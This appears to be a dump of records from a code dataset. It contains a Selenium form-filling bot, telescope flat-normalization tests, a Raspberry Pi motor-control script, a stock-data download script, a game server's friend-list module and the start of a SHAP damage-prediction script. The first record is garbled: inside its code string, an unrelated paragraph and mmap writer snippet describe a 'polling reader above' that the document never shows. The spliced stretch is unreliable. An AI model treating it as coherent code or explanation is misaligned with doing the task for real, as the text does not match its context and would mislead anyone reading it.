Yes':\n self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538939790']\").click()\n self.wait_an_element_by_xpath(\"//label[@title='是 Yes']\").click()\n self.wait_an_element_by_xpath(\"//span[@class='form-save position-absolute']\").click()\n\n def run(self):\n self.load_cookie()\n if self.driver.current_url != self.APP_URL:\n self.login()\n self.fill()\n\n # def 
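The polling reader above treats the shared file as a sequence of fixed 256-byte records: one flag byte (non-zero means unread) followed by 255 payload bytes, with the flag zeroed after a successful read. A writer for that (inferred) layout should store the payload before raising the flag, so the reader can never consume a half-written record. A hedged sketch:

import mmap

RECORD = 256  # 1 flag byte + 255 payload bytes, inferred from the reader above

def write_record(mm: mmap.mmap, slot: int, payload: bytes) -> None:
    data = payload[:255].ljust(255, b'\x00')  # pad/truncate to the fixed slot size
    base = slot * RECORD
    mm[base + 1:base + RECORD] = data  # payload first ...
    mm[base:base + 1] = b'\x01'        # ... flag last: reader only sees complete data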
__del__(self):\n # self.driver.close()\n","sub_path":"Browser.py","file_name":"Browser.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"290452286","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom banzai.flats import FlatNormalizer\nfrom banzai.tests.utils import FakeImage\nimport numpy as np\nimport pytest\n\n\n@pytest.fixture(scope='module')\ndef set_random_seed():\n np.random.seed(9723492)\n\n\ndef test_no_input_images(set_random_seed):\n normalizer = FlatNormalizer(None)\n images = normalizer.do_stage([])\n assert len(images) == 0\n\n\ndef test_group_by_keywords(set_random_seed):\n normalizer = FlatNormalizer(None)\n assert normalizer.group_by_keywords is None\n\n\ndef test_header_has_flatlevel(set_random_seed):\n normalizer = FlatNormalizer(None)\n images = normalizer.do_stage([FakeImage(image_multiplier=2.0) for _ in range(6)])\n for image in images:\n assert image.header['FLATLVL'] == 2.0\n\n\ndef test_header_flatlevel_is_5(set_random_seed):\n normalizer = FlatNormalizer(None)\n images = normalizer.do_stage([FakeImage(image_multiplier=5.0) for _ in range(6)])\n for image in images:\n assert image.header['FLATLVL'] == 5.0\n\n\ndef test_flat_normalization_is_reasonable(set_random_seed):\n flat_variation = 0.05\n input_level = 10000.0\n nx = 101\n ny = 103\n\n normalizer = FlatNormalizer(None)\n images = [FakeImage() for _ in range(6)]\n flat_pattern = np.random.normal(1.0, flat_variation, size=(ny, nx))\n for image in images:\n image.data = np.random.poisson(flat_pattern * input_level).astype(float)\n\n images = normalizer.do_stage(images)\n\n for image in images:\n # For right now, we only use a quarter of the image to calculate the flat normalization\n # because real ccds have crazy stuff at the edges, so the S/N is cut down by a factor of 2\n # Assume 50% slop because the variation in the pattern does not decrease like sqrt(n)\n assert np.abs(image.header['FLATLVL'] - input_level) < (3.0 * flat_variation * input_level / (nx * ny) ** 0.5)\n assert np.abs(np.mean(image.data) - 1.0) <= 3.0 * flat_variation / (nx * ny) ** 0.5\n","sub_path":"banzai/tests/test_flat_normalizer.py","file_name":"test_flat_normalizer.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113845095","text":"import pygame\nimport RPi.GPIO as GPIO\nimport sys\nimport time\n\n\ndef main():\n pygame.init()\n surface = pygame.display.set_mode([250, 250])\n surface.fill((0, 0, 0))\n pygame.display.set_caption(\"control\")\n setting = Settings()\n status = Status()\n GPIO_init()\n d1 = GPIO.PWM(setting.d_1, 10000)\n d2 = GPIO.PWM(setting.d_2, 10000)\n f1 = GPIO.PWM(setting.f_1, 10000)\n f2 = GPIO.PWM(setting.f_2, 10000)\n f1.start(0)\n f2.start(0)\n d1.start(0)\n d2.start(0)\n while True:\n check_event(status)\n response_event(setting, status, d1, d2, f1, f2)\n\n\nclass Settings:\n\n def __init__(self):\n self.f_1 = 6\n self.f_2 = 13\n self.d_1 = 19\n self.d_2 = 26\n\n self.sleep_time = 0.3\n self.der_sleep_time = 0.02\n self.d_duty_cycle = 100\n self.f_duty_cycle = 80\n\n\nclass Status:\n\n def __init__(self):\n self.forward_flag = False\n self.left_turn_flag = False\n self.right_turn_flag = False\n self.back_off_flag = False\n\n self.down_time1 = time.time()\n self.up_time1 = time.time()\n self.down_time2 = time.time()\n self.up_time2 = time.time()\n\n\ndef GPIO_init():\n 
GPIO.setmode(GPIO.BCM)\n for i in (6, 13, 19, 26):\n GPIO.setup(i, GPIO.OUT, initial=GPIO.LOW)\n\n\ndef check_event(status):\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE):\n GPIO.cleanup()\n pygame.quit()\n sys.exit()\n else:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n status.forward_flag = True\n status.down_time1 = time.time()\n print(\"forward\")\n if event.key == pygame.K_LEFT:\n status.left_turn_flag = True\n print(\"forward and left\")\n if event.key == pygame.K_RIGHT:\n status.right_turn_flag = True\n print(\"forward and right\")\n if event.key == pygame.K_DOWN:\n status.back_off_flag = True\n status.down_time2 = time.time()\n print(\"back off\")\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n status.forward_flag = False\n status.up_time1 = time.time()\n print(\"stop\")\n if event.key == pygame.K_LEFT:\n status.left_turn_flag = False\n print(\"stop left\")\n if event.key == pygame.K_RIGHT:\n status.right_turn_flag = False\n print(\"stop right\")\n if event.key == pygame.K_DOWN:\n status.back_off_flag = False\n status.up_time2 = time.time()\n print(\"stop back off\")\n else:\n pass\n\n\ndef slow_speed_up(setting, status, speed_io, zero_io, turn_flag=False):\n \"\"\"\n 匀加速,以免过载\n :param turn_flag:\n :param setting:\n :param status:\n :param speed_io:\n :param zero_io:\n :return:\n \"\"\"\n i = 0\n while status.down_time1 - status.up_time2 <= setting.sleep_time:\n i += int(setting.f_duty_cycle / (setting.sleep_time / setting.der_sleep_time))\n if turn_flag:\n if i > int(setting.f_duty_cycle/2):\n break\n else:\n if i > setting.f_duty_cycle:\n break\n speed_io.ChangeDutyCycle(i)\n zero_io.ChangeDutyCycle(0)\n time.sleep(setting.der_sleep_time)\n\n\ndef response_event(setting, status, d1, d2, f1, f2):\n if status.forward_flag:\n if status.back_off_flag:\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(0)\n else:\n if status.left_turn_flag and status.right_turn_flag:\n slow_speed_up(setting, status, f1, f2)\n f1.ChangeDutyCycle(setting.f_duty_cycle)\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n else:\n if status.left_turn_flag:\n slow_speed_up(setting, status, f1, f2, True)\n f1.ChangeDutyCycle(int(setting.f_duty_cycle/2))\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(setting.d_duty_cycle)\n d2.ChangeDutyCycle(0)\n elif status.right_turn_flag:\n slow_speed_up(setting, status, f1, f2, True)\n f1.ChangeDutyCycle(int(setting.f_duty_cycle/2))\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(setting.d_duty_cycle)\n else:\n if status.down_time1 - status.up_time2 <= setting.sleep_time:\n time.sleep(setting.sleep_time - (status.down_time1 - status.up_time2))\n slow_speed_up(setting, status, f1, f2)\n f1.ChangeDutyCycle(setting.f_duty_cycle)\n f2.ChangeDutyCycle(0)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n else:\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(0)\n if status.back_off_flag:\n if status.left_turn_flag and status.right_turn_flag:\n slow_speed_up(setting, status, f2, f1)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(setting.f_duty_cycle)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n else:\n if status.left_turn_flag:\n slow_speed_up(setting, status, f2, f1, True)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(int(setting.f_duty_cycle/2))\n d1.ChangeDutyCycle(setting.d_duty_cycle)\n d2.ChangeDutyCycle(0)\n elif status.right_turn_flag:\n slow_speed_up(setting, status, f2, f1, True)\n f1.ChangeDutyCycle(0)\n 
f2.ChangeDutyCycle(int(setting.f_duty_cycle / 2))\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(setting.d_duty_cycle)\n else:\n if status.down_time2 - status.up_time1 <= setting.sleep_time:\n time.sleep(setting.sleep_time - (status.down_time2 - status.up_time1))\n slow_speed_up(setting, status, f2, f1)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(setting.f_duty_cycle)\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n\n else:\n d1.ChangeDutyCycle(0)\n d2.ChangeDutyCycle(0)\n f1.ChangeDutyCycle(0)\n f2.ChangeDutyCycle(0)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"bmw_car_remote_control.py","file_name":"bmw_car_remote_control.py","file_ext":"py","file_size_in_byte":6961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"347955589","text":"\nimport baostock as bs\nimport pandas as pd\n\n#http://baostock.com/baostock/index.php/%E9%A6%96%E9%A1%B5官网\n\ndef 保存csv文件(保存路径,df):\n df.to_csv(保存路径,encoding='utf_8_sig',index=False)\n#### 登陆系统 ####\nlg = bs.login()\n# 显示登陆返回信息\nprint('login respond error_code:'+lg.error_code)\nprint('login respond error_msg:'+lg.error_msg)\n\n#### 获取沪深A股历史K线数据 ####\n# 详细指标参数,参见“历史行情指标参数”章节;“分钟线”参数与“日线”参数不同。“分钟线”不包含指数。\n# 分钟线指标:date,time,code,open,high,low,close,volume,amount,adjustflag\n# 周月线指标:date,code,open,high,low,close,volume,amount,adjustflag,turn,pctChg\nrs = bs.query_history_k_data_plus(\"sz.000778\",\n \"date,code,time,open,close\",\n start_date='2021-03-01', end_date='2021-03-03',\n frequency=\"5\", adjustflag=\"3\")\nprint('query_history_k_data_plus respond error_code:'+rs.error_code)\nprint('query_history_k_data_plus respond error_msg:'+rs.error_msg)\n\n#### 打印结果集 ####\ndata_list = []\nwhile (rs.error_code == '0') & rs.next():\n # 获取一条记录,将记录合并在一起\n data_list.append(rs.get_row_data())\ndf = pd.DataFrame(data_list, columns=rs.fields)\nprint(df)\n\n保存路径='C:/Users/YcAllenEffy/Desktop/222.csv'\n保存csv文件(保存路径,df)\n#### 登出系统 ####\nbs.logout()","sub_path":"其他学习_少量/量化交易学习/量化学习_baostock.py","file_name":"量化学习_baostock.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"447677879","text":"# -*- coding:utf-8 -*-\n\"\"\"\ncreated by server on 14-7-17下午4:36.\n\"\"\"\n\nfrom gfirefly.server.logobj import logger\nfrom gfirefly.server.globalobject import remoteserviceHandle\nfrom gfirefly.server.globalobject import GlobalObject\nfrom app.battle.battle_unit import BattleUnit\nfrom app.game.redis_mode import tb_character_info\nfrom app.game.redis_mode import tb_character_level\nfrom app.game.action.root.netforwarding import push_message\nfrom app.proto_file.common_pb2 import CommonResponse\nfrom shared.db_opear.configs_data import game_configs, data_helper\nfrom app.proto_file import friend_pb2\nfrom app.proto_file.db_pb2 import Heads_DB\nfrom app.proto_file.db_pb2 import Stamina_DB\nfrom shared.utils.date_util import is_next_day\nfrom app.game.core.item_group_helper import gain, get_return\nfrom app.game.core.mail_helper import send_mail\nfrom shared.utils.const import const\nfrom app.game.core.task import hook_task, CONDITIONId\nfrom app.game.redis_mode import tb_pvp_rank\nimport datetime\nimport random\nimport time\nfrom app.game.action.node._fight_start_logic import assemble\n\n\nremote_gate = GlobalObject().remote.get('gate')\n\n\n@remoteserviceHandle('gate')\ndef add_friend_request_1100(data, player):\n \"\"\" request to invite target as friend \"\"\"\n response = CommonResponse()\n response.result = True\n 
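slow_speed_up in the motor-control script above ramps the PWM duty cycle in fixed increments instead of jumping straight to full power, so the drive motors are not jolted from standstill. The same idea as a small reusable helper; a hedged sketch assuming an RPi.GPIO PWM instance such as f1/f2:

import time

def ramp_duty(pwm, target, steps=15, dt=0.02):
    # step linearly from 0 to `target` percent over steps * dt seconds,
    # limiting inrush current at start-up
    for k in range(1, steps + 1):
        pwm.ChangeDutyCycle(target * k / steps)
        time.sleep(dt)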
response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n if len(request.target_ids) < 1:\n response.result = False\n response.result_no = 11005 # fail\n return response.SerializePartialToString() # fail\n\n max_num_friend = game_configs.base_config.get('max_of_UserFriend')\n if len(player.friends.friends) >= max_num_friend:\n response.result = False\n response.result_no = 11003 # fail\n return response.SerializePartialToString() # fail\n\n target_id = request.target_ids[0]\n\n if target_id == player.base_info.id:\n response.result = False # cant invite oneself as friend\n response.result_no = 11004 # fail\n return response.SerializePartialToString() # fail\n\n if not push_message('add_friend_request_remote', target_id,\n player.base_info.id):\n response.result = False\n response.result_no = 11002\n return response.SerializePartialToString() # fail\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_friend_respond_accept_1101(data, player):\n \"\"\" respond to inviter \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.add_friend(target_id):\n response.result = False\n continue\n\n # save data\n player.friends.save_data()\n\n if not push_message('become_friends_remote',\n target_id,\n player.base_info.id):\n response.result = False\n\n send_mail(conf_id=301, nickname=player.base_info.base_name,\n receive_id=target_id)\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_friend_respond_refuse_1102(data, player):\n \"\"\" refuse inviting \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.del_applicant(target_id):\n response.result = False\n response.result_no += 1\n\n # save data\n player.friends.save_data()\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef del_friend_request_1103(data, player):\n \"\"\" delete friend from friend list \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n for target_id in request.target_ids:\n if not player.friends.del_friend(target_id):\n response.result = False\n\n # save data\n player.friends.save_data()\n\n response.result = push_message('delete_friend_remote',\n target_id,\n player.base_info.id)\n response.result_no += 1\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_black_list_1104(data, player):\n \"\"\" add a player to blacklist by id \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n if not player.friends.add_blacklist(target_id):\n response.result = False\n response.result_no += 1\n\n # save data\n player.friends.save_data()\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef del_black_list_1105(data, player):\n \"\"\" delete a player from blacklist \"\"\"\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n for target_id in request.target_ids:\n 
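`add_friend_request_1100` validates with a chain of early returns, each mapping to a numeric error code in the response. The same guard-clause shape in isolation (a sketch: `player` here is any object with matching attributes, and the error codes are the handler's own):

```python
def validate_friend_request(player, target_ids, max_friends):
    """Guard-clause validation mirroring add_friend_request_1100;
    returns (ok, error_no)."""
    if len(target_ids) < 1:
        return False, 11005          # no target given
    if len(player.friends.friends) >= max_friends:
        return False, 11003          # friend list full
    if target_ids[0] == player.base_info.id:
        return False, 11004          # cannot invite oneself
    return True, 0
```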
if not player.friends.del_blacklist(target_id):\n response.result = False\n response.result_no += 1\n\n # save data\n player.friends.save_data()\n return response.SerializePartialToString()\n\n\ndef _with_battle_info(response, friend):\n # 添加好友主将的属性\n column = ['id', 'lord_attr_info', 'heads', 'nickname', 'vip_level',\n 'attackPoint', 'upgrade_time', 'level']\n friend_data = friend.hmget(column)\n if friend_data.get('lord_attr_info').get('info'):\n battle_unit = BattleUnit.loads(friend_data.get('lord_attr_info').get('info'))\n logger.debug(\"battle_unit %s\" % battle_unit)\n assemble(response.friend_info, battle_unit)\n logger.debug(response.friend_info)\n\n response.id = friend_data['id']\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n response.hero_no = friend_heads.now_head\n response.vip_level = friend_data['vip_level']\n response.level = friend_data['level']\n rank = tb_pvp_rank.zscore(friend_data['id'])\n if rank:\n response.b_rank = int(rank)\n\n if remote_gate.online_remote(friend_data['id']) == 0:\n response.last_time = friend_data['upgrade_time']\n\n response.nickname = friend_data['nickname']\n if friend_data['attackPoint']:\n response.power = int(friend_data['attackPoint'])\n\n\n@remoteserviceHandle('gate')\ndef get_player_friend_list_1106(data, player):\n response = friend_pb2.GetPlayerFriendsResponse()\n response.open_receive = player.stamina._open_receive\n\n # 小伙伴支援\n player.friends.check_time()\n # if is_next_day(time.time(), player.friends.fight_last_time):\n # # clear data in the next day\n # player.friends.fight_times = {}\n # player.friends.save_data()\n _update = False\n\n for pid in player.friends.friends + [player.base_info.id]:\n player_data = tb_character_info.getObj(pid)\n if player_data.exists():\n response_friend_add = response.friends.add()\n friend_data = player_data.hmget(['conditions_day', 'last_day'])\n response_friend_add.gift = player.friends.last_present_times(pid)\n\n conditions_day = friend_data.get('conditions_day', {})\n lively = conditions_day.get(24, 0)\n today = time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n if today != time.strftime(\"%Y%m%d\", time.localtime(friend_data.get('last_day', '0'))):\n lively = 0\n response_friend_add.current = lively\n response_friend_add.target = game_configs.base_config['friendActivityValue']\n stat, update = player.friends.get_reward(pid, today)\n if update:\n _update = True\n response_friend_add.stat = stat\n\n # 添加好友主将的属性\n _with_battle_info(response_friend_add, player_data)\n response_friend_add.gift = player.friends.last_present_times(pid)\n response_friend_add.fight_last_time = int(player.friends.fight_times.get(pid, [0])[0])\n response_friend_add.fight_times = len(player.friends.fight_times.get(pid, []))\n else:\n logger.error('friend_list, cant find player id:%d' % pid)\n player.friends.friends.remove(pid)\n if _update:\n player.friends.save_data()\n\n for pid in player.friends.blacklist:\n player_data = tb_character_info.getObj(pid)\n if player_data.exists():\n response_blacklist_add = response.blacklist.add()\n\n # 添加好友主将的属性\n _with_battle_info(response_blacklist_add, player_data)\n else:\n logger.error('black_list cant find player id:%d' % pid)\n player.friends.blacklist.remove(pid)\n\n for pid in player.friends.applicant_list:\n player_data = tb_character_info.getObj(pid)\n if player_data.exists():\n response_applicant_list_add = response.applicant_list.add()\n\n # 添加好友主将的属性\n _with_battle_info(response_applicant_list_add, player_data)\n else:\n 
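`_with_battle_info` pulls the PvP rank with `zscore` on a sorted set, where the stored score is the rank itself. The project goes through its own redis table wrappers; with plain redis-py the equivalent lookups would look roughly like this (the key name and local-server connection are assumptions):

```python
import redis

r = redis.Redis()  # assumes a local redis server; key name is illustrative

def pvp_rank(player_id):
    """Rank lookup as _with_battle_info does it: the sorted-set score
    itself stores the rank, so a plain zscore suffices."""
    score = r.zscore('tb_pvp_rank', player_id)
    return int(score) if score is not None else None

def pvp_rank_by_position(player_id):
    """The more common convention: score = rating, rank = position.
    zrevrank gives the 0-based position by descending score."""
    pos = r.zrevrank('tb_pvp_rank', player_id)
    return pos + 1 if pos is not None else None
```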
logger.error('applicant_list, cant find player id:%d' % pid)\n player.friends.applicant_list.remove(pid)\n\n logger.debug(\"response.friends %s\" % response.friends)\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef draw_friend_lively_1199(data, player):\n request = friend_pb2.DrawRewardReq()\n request.ParseFromString(data)\n response = friend_pb2.DrawRewardRsp()\n response.fid = request.fid\n today = time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n stat, update = player.friends.get_reward(request.fid, today)\n if stat:\n response.res.result = False\n response.res.result_no = 11991 # 已领取\n else:\n player_data = tb_character_info.getObj(request.fid)\n friend_data = player_data.hmget(['conditions_day', 'last_day'])\n conditions_day = friend_data.get('conditions_day', {})\n lively = conditions_day.get(24, 0)\n if today != time.strftime(\"%Y%m%d\", time.localtime(friend_data.get('last_day', '0'))):\n lively = 0\n if lively < game_configs.base_config['friendActivityValue']:\n logger.debug('error_no:11992,lively:%d' % lively)\n response.res.result = False\n response.res.result_no = 11992 # 未完成\n else:\n response.res.result = True\n reward = game_configs.base_config['friendActivityReward']\n lively_reward = data_helper.parse(reward)\n return_data = gain(player, lively_reward, const.LIVELY_REWARD) # 获取\n get_return(player, return_data, response.gain)\n player.friends.set_reward(request.fid, today, 1)\n update = True\n\n if update:\n player.friends.save_data()\n\n return response.SerializePartialToString()\n\n\ndef fill_friend_info(player_data, response):\n friend_data = player_data.hmget(['id',\n 'attackPoint',\n 'nickname',\n 'heads',\n 'level',\n 'upgrade_time'])\n response.id = friend_data.get('id')\n response.nickname = friend_data.get('nickname')\n if friend_data['attackPoint'] is not None:\n response.power = int(friend_data['attackPoint'])\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n response.hero_no = friend_heads.now_head\n response.level = friend_data['level']\n if remote_gate.online_remote(friend_data['id']) == 0:\n response.last_time = friend_data['upgrade_time']\n\n\n@remoteserviceHandle('gate')\ndef find_friend_request_1107(data, player):\n request = friend_pb2.FindFriendRequest()\n request.ParseFromString(data)\n\n response = friend_pb2.FindFriendResponse()\n if request.id_or_nickname.isdigit():\n player_data = tb_character_info.getObj(request.id_or_nickname)\n if player_data.exists():\n info = response.infos.add()\n info.gift = datetime.datetime.now().day\n fill_friend_info(player_data, info)\n\n nickname_obj = tb_character_info.getObj('nickname')\n isexist = nickname_obj.hexists(request.id_or_nickname)\n pid = nickname_obj.hget(request.id_or_nickname)\n player_data = tb_character_info.getObj(pid)\n if isexist:\n info = response.infos.add()\n info.gift = datetime.datetime.now().day\n fill_friend_info(player_data, info)\n\n return response.SerializePartialToString()\n\n\ndef get_recommend(player, up, down, recommend_num, response):\n front = player.base_info.level - down\n back = player.base_info.level + up\n uids = tb_character_level.zrangebyscore(front, back+1)\n count = 0\n # now = int(time.time())\n\n has_one = []\n for uid in uids:\n uid = int(uid)\n if uid == player.base_info.id:\n continue\n elif player.friends.is_friend(uid):\n continue\n elif uid in has_one:\n continue\n else:\n has_one.append(uid)\n\n player_data = tb_character_info.getObj(uid)\n isexist = player_data.exists()\n if count >= 
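`draw_friend_lively_1199` (and `get_player_friend_list_1106` before it) resets the activity counter whenever the stored timestamp falls on an earlier day, by comparing `%Y%m%d` strings. The rollover check in isolation, assuming `last_ts` is a Unix timestamp:

```python
import time

def lively_for_today(lively, last_ts):
    """Return the counter, reset to 0 if last_ts is from a previous day."""
    today = time.strftime("%Y%m%d", time.localtime(time.time()))
    last_day = time.strftime("%Y%m%d", time.localtime(last_ts))
    return lively if last_day == today else 0
```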
recommend_num:\n break\n\n if isexist:\n friend_data = player_data.hmget(['id', 'nickname',\n 'attackPoint', 'heads',\n 'level', 'upgrade_time'])\n if not friend_data.get('nickname'):\n continue\n count += 1\n friend = response.rfriend.add()\n friend.id = friend_data.get('id')\n friend.nickname = friend_data.get('nickname')\n if friend_data['attackPoint'] is not None:\n friend.power = int(friend_data['attackPoint'])\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n friend.hero_no = friend_heads.now_head\n\n friend.level = friend_data['level']\n friend.b_rank = 1\n if remote_gate.online_remote(friend_data['id']) == 0:\n friend.last_time = friend_data['upgrade_time']\n friend.fight_last_time = player.friends.fight_times.get(uid, [0])[0]\n friend.fight_times = len(player.friends.fight_times.get(uid, []))\n\n # 添加好友主将的属性\n _with_battle_info(friend, player_data)\n return count\n\n\n@remoteserviceHandle('gate')\ndef recommend_friend_1198(data, player):\n response = friend_pb2.RecommendRes()\n x = game_configs.base_config['friendApplyLevelGap']\n front = player.base_info.level - x\n back = player.base_info.level + x\n uids = tb_character_level.zrangebyscore(front, back+1)\n statics = game_configs.base_config['FriendRecommendNum']\n add_count_conf = game_configs.base_config.get('friendApplyLevelGapAdd', 5)\n player_level_max = game_configs.base_config['player_level_max']\n count = 0\n now = int(time.time())\n\n has_one = []\n add_count = 1\n while True:\n for uid in uids:\n uid = int(uid)\n if uid == player.base_info.id:\n continue\n elif player.friends.is_friend(uid):\n continue\n elif uid in has_one:\n continue\n else:\n has_one.append(uid)\n\n player_data = tb_character_info.getObj(uid)\n isexist = player_data.exists()\n if count >= statics:\n break\n\n if isexist:\n last_time = player_data.hget('upgrade_time')\n if now - last_time > game_configs.base_config['friendApplyOfflineDay']*24*60*60:\n continue\n friend_data = player_data.hmget(['id', 'nickname',\n 'attackPoint', 'heads',\n 'level', 'upgrade_time'])\n if not friend_data.get('nickname'):\n continue\n count += 1\n friend = response.rfriend.add()\n friend.id = friend_data.get('id')\n friend.nickname = friend_data.get('nickname')\n ap = 1\n if friend_data['attackPoint'] is not None:\n ap = int(friend_data['attackPoint'])\n friend.power = ap if ap else 0\n\n friend_heads = Heads_DB()\n friend_heads.ParseFromString(friend_data['heads'])\n friend.hero_no = friend_heads.now_head\n\n friend.level = friend_data['level']\n friend.b_rank = 1\n if remote_gate.online_remote(friend_data['id']) == 0:\n friend.last_time = friend_data['upgrade_time']\n\n # 添加好友主将的属性\n _with_battle_info(friend, player_data)\n if count >= statics:\n break\n else:\n front = front - add_count*add_count_conf\n back = back + add_count*add_count_conf\n if front <= 0:\n front = 1\n if back > player_level_max:\n back = player_level_max\n uids = tb_character_level.zrangebyscore(front, back+1)\n if back >= player_level_max and front <= 1:\n break\n\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef given_stamina_1108(data, player):\n response = CommonResponse()\n response.result = True\n response.result_no = 0\n request = friend_pb2.FriendCommon()\n request.ParseFromString(data)\n\n target_id = request.target_ids[0]\n\n player_data = tb_character_info.getObj(target_id)\n stamina_db = Stamina_DB()\n stamina_db.ParseFromString(player_data.hget('stamina'))\n open_receive = stamina_db.open_receive\n\n if not 
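`recommend_friend_1198` widens its level window step by step and re-queries the sorted set until it has enough candidates or has covered the whole level range. A sketch of that expanding-window loop, with a plain `query(lo, hi)` callable standing in for `tb_character_level.zrangebyscore`:

```python
def expanding_window_pick(query, level, gap, step, level_max, wanted):
    """Widen [level-gap, level+gap] until `wanted` candidates are found.

    `query(lo, hi)` stands in for the sorted-set range query; the
    clamping to [1, level_max] mirrors recommend_friend_1198.
    """
    lo, hi = max(1, level - gap), min(level_max, level + gap)
    picked = []
    while True:
        for uid in query(lo, hi):
            if uid not in picked:
                picked.append(uid)
            if len(picked) >= wanted:
                return picked
        if lo <= 1 and hi >= level_max:
            return picked          # whole level range searched
        lo = max(1, lo - step)
        hi = min(level_max, hi + step)
```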
player.friends.given_stamina(target_id, if_present=open_receive):\n response.result = False\n response.result_no = 1 # fail\n return response.SerializePartialToString() #\n\n player.friends.save_data()\n hook_task(player, CONDITIONId.SEND_STAMINA, 1)\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef add_friend_request_remote(target_id, is_online, player):\n logger.debug('add friend request:%s, %s', is_online, target_id)\n result = player.friends.add_applicant(target_id)\n # assert(result)\n player.friends.save_data()\n if is_online:\n remote_gate.push_object_remote(1110,\n player.base_info.id,\n [player.dynamic_id])\n return True\n\n\n@remoteserviceHandle('gate')\ndef become_friends_remote(target_id, is_online, player):\n result = player.friends.add_friend(target_id, False)\n # assert(result)\n player.friends.save_data()\n hook_task(player, CONDITIONId.ADD_FRIEND, 1)\n return True\n\n\n@remoteserviceHandle('gate')\ndef open_friend_receive_1061(data, player):\n \"\"\" 开启好友活力赠送\n @author: jiang\n \"\"\"\n response = CommonResponse()\n player.stamina.open_receive()\n player.stamina.save_data()\n response.result = True\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef close_friend_receive_1062(data, player):\n \"\"\" 关闭好友活力赠送\n @author: jiang\n \"\"\"\n response = CommonResponse()\n player.stamina.close_receive()\n player.stamina.save_data()\n response.result = True\n return response.SerializePartialToString()\n\n\n@remoteserviceHandle('gate')\ndef delete_friend_remote(target_id, is_online, player):\n result = player.friends.del_friend(target_id)\n player.friends.save_data()\n return result\n\n\n@remoteserviceHandle('gate')\ndef add_blacklist_request_remote(target_id, is_online, player):\n result = player.friends.add_blacklist(target_id)\n player.friends.save_data()\n return result\n\n\n@remoteserviceHandle('gate')\ndef get_recommend_friend_list_1109(data, player):\n response = friend_pb2.RecommendRes()\n num = get_recommend(player, 5, 0, 10, response)\n if num < 10:\n response = friend_pb2.RecommendRes()\n get_recommend(player, 5, 5, 10, response)\n\n return response.SerializePartialToString()\n","sub_path":"app/game/action/node/friend.py","file_name":"friend.py","file_ext":"py","file_size_in_byte":20553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164787921","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 25 14:22:20 2020\n\n@author: bruno\n\"\"\"\n\n# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# # SHM modelo predição de dano explicado pelo SHAP\n\n# %%\nimport pandas as pd\nimport numpy as np\nimport shap\nimport os\nimport matplotlib.pyplot as plt\n\n# ## Leitura da base de dados\n# %%\ndiretorio = 'Pasta de Dados/Validos/'\nquantidadeamostras = 20\nquantidadeniveis = 3\nquantidadetemperaturas = 7\nquantidadepzt = 3\n\ndirec = os.listdir(diretorio)\n# %%\ntemperaturas = {1:-10, 2:0, 3:10, 4:20, 5:30, 6:40, 7:50}\nvalues = pd.qcut(np.arange(2000),20, 